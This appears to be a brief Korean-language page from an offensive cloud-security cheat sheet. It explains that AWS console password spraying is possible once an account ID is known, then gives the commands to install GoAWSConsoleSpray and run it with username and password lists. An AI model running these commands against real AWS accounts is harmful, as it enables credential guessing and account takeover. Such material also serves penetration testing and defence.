Password Spraying

AWS 계정의 Account Id를 알고있을 때 패스워드 스프레이 공격이 가능합니다.

Abuse

# 패스워드 스프레이 도구 설치
go install github.com/WhiteOakSecurity/GoAWSConsoleSpray@latest

# 스프레이 공격 (Account Id, username, password 필요)
GoAWSConsoleSpray -a '<account-id>' -u '<username-file>' -p '<password-file>'
PreviousModifyInstanceAttributependingNextAzure

Last updated